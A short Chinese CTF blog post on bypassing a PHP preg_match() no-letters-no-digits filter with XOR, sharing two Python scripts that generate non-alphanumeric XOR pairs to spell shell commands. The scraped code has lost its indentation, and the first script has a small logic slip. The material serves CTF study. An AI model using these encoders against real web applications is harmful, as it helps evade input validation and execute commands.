最近做了道使用异或绕过preg_match()的题,正则的要求是没有字母数字。
网上翻文章,搜集了两个脚本
#朋友给的,也不知道最早是哪个师傅写的
def encode(command):
code = "~`!@#$%&*()-=+_[]{};:<>,.?/|"
result_1 = ""
result_2 = ""
for x in command:
if not command.isalpha():
result_1 += x
result_2 += x
for y in code:
if chr(ord(x) ^ ord(y)) in code:
result_1 += y
result_2 += chr(ord(x) ^ ord(y))
break
return f'("{result_1}" ^ "{result_2}")'
a=encode('ls')
print(a)第二个脚本会返回所有字母的异或组合,得自己手工找拼出命令,或者改造一下脚本也行。
#来源: 国光
#文章作者: 国光
#文章链接: https://www.sqlsec.com/2020/07/shell.html#toc-heading-24
#咳咳又想白嫖文章?本文章著作权归作者所有,任何形式的转载都请注明出处。
import string
from urllib.parse import quote
keys = list(range(65)) + list(range(91,97)) + list(range(123,127))
results = []
for i in keys:
for j in keys:
asscii_number = i^j
if (asscii_number >= 65 and asscii_number <= 90) or (asscii_number >= 97 and asscii_number <= 122):
if i < 32 and j < 32:
temp = (f'{chr(asscii_number)} = ascii:{i} ^ ascii{j} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
results.append(temp)
elif i < 32 and j >=32:
temp = (f'{chr(asscii_number)} = ascii:{i} ^ {chr(j)} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
results.append(temp)
elif i >= 32 and j < 32:
temp = (f'{chr(asscii_number)} = {chr(i)} ^ ascii{j} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
results.append(temp)
else:
temp = (f'{chr(asscii_number)} = {chr(i)} ^ {chr(j)} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
results.append(temp)
results.sort(key=lambda x:x[1], reverse=False)
for low_case in string.ascii_lowercase:
for result in results:
if low_case in result:
print(result[0])
for upper_case in string.ascii_uppercase:
for result in results:
if upper_case in result:
print(result[0])
68
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
